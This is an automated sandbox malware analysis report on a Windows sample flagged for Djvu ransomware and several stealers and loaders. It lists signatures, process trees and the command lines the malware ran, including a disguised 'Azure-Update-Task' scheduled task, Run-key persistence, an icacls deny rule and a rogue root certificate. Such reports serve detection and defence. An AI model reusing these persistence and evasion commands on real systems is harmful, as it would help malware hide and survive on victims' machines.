Malware Analysis Report

2025-01-02 11:07

Sample ID 240315-bjc8zaeh28
Target 8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d
SHA256 8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d
Tags
amadey dcrat djvu smokeloader vidar 82df9629d6ef6fc7fe54d6eb2bc6137b pub1 backdoor discovery evasion infostealer persistence ransomware rat spyware stealer trojan lumma stealc zgrat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d

Threat Level: Known bad

The file 8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d was found to be: Known bad.

Malicious Activity Summary

Amadey

Detected Djvu ransomware

ZGRat

Djvu Ransomware

DcRat

Vidar

Lumma Stealer

Detect ZGRat V1

Stealc

SmokeLoader

Detect Vidar Stealer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Blocklisted process makes network request

Modifies file permissions

Reads WinSCP keys stored on the system

Reads local data of messenger clients

Identifies Wine through registry keys

Deletes itself

Checks BIOS information in registry

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of web browsers

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

Delays execution with timeout.exe

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-15 01:10

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-15 01:10

Reported

2024-03-15 01:15

Platform

win7-20240221-en

Max time kernel

300s

Max time network

301s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\f6994695-3cd8-4f33-87d3-a992b1783b4e\\6375.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe N/A

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\3F18.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\3F18.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\3F18.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D55B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F31A.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3F18.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\463A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4D8B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\3F18.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\463A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\463A.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads local data of messenger clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\f6994695-3cd8-4f33-87d3-a992b1783b4e\\6375.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Windows\CurrentVersion\Run\blyat.dll = "rundll32 C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005011\\blyat.dll, Main" C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3F18.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Dctooux.job C:\Users\Admin\AppData\Local\Temp\463A.exe N/A
File created C:\Windows\Tasks\explorgu.job C:\Users\Admin\AppData\Local\Temp\3F18.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [binary certificate blob omitted] C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [binary certificate blob omitted] C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3F18.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\463A.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1216 wrote to memory of 2700 N/A N/A C:\Windows\system32\cmd.exe
PID 1216 wrote to memory of 2700 N/A N/A C:\Windows\system32\cmd.exe
PID 1216 wrote to memory of 2700 N/A N/A C:\Windows\system32\cmd.exe
PID 2700 wrote to memory of 2848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2700 wrote to memory of 2848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2700 wrote to memory of 2848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1216 wrote to memory of 328 N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 1216 wrote to memory of 328 N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 1216 wrote to memory of 328 N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 1216 wrote to memory of 328 N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 328 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 328 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 328 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 328 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 328 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 328 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 328 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 328 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 328 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 328 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 328 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2600 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Windows\SysWOW64\icacls.exe
PID 2600 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Windows\SysWOW64\icacls.exe
PID 2600 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Windows\SysWOW64\icacls.exe
PID 2600 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Windows\SysWOW64\icacls.exe
PID 2600 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2600 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2600 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2600 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2392 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2392 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2392 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2392 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2392 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2392 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2392 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2392 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2392 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2392 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2392 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 1820 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 1820 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 1820 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 1820 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 660 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 660 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 660 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 660 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 660 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 660 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 660 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 660 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 660 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 660 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 660 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 3016 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Windows\SysWOW64\WerFault.exe
PID 3016 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Windows\SysWOW64\WerFault.exe
PID 3016 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Windows\SysWOW64\WerFault.exe
PID 3016 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Windows\SysWOW64\WerFault.exe
PID 1820 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe
PID 1820 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe
PID 1820 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe
PID 1820 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe
PID 2980 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe

"C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\BCBA.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\6375.exe

C:\Users\Admin\AppData\Local\Temp\6375.exe

C:\Users\Admin\AppData\Local\Temp\6375.exe

C:\Users\Admin\AppData\Local\Temp\6375.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\f6994695-3cd8-4f33-87d3-a992b1783b4e" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\6375.exe

"C:\Users\Admin\AppData\Local\Temp\6375.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\6375.exe

"C:\Users\Admin\AppData\Local\Temp\6375.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe

"C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe"

C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe

"C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 1444

C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe

"C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe"

C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe

"C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\Temp\D55B.exe

C:\Users\Admin\AppData\Local\Temp\D55B.exe

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\D80A.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 124

C:\Users\Admin\AppData\Local\Temp\F31A.exe

C:\Users\Admin\AppData\Local\Temp\F31A.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {E17D5ECB-3BDA-44A1-9410-37913DE0A1EC} S-1-5-21-1650401615-1019878084-3673944445-1000:UADPPTXT\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\Temp\3F18.exe

C:\Users\Admin\AppData\Local\Temp\3F18.exe

C:\Users\Admin\AppData\Local\Temp\463A.exe

C:\Users\Admin\AppData\Local\Temp\463A.exe

C:\Users\Admin\AppData\Local\Temp\4D8B.exe

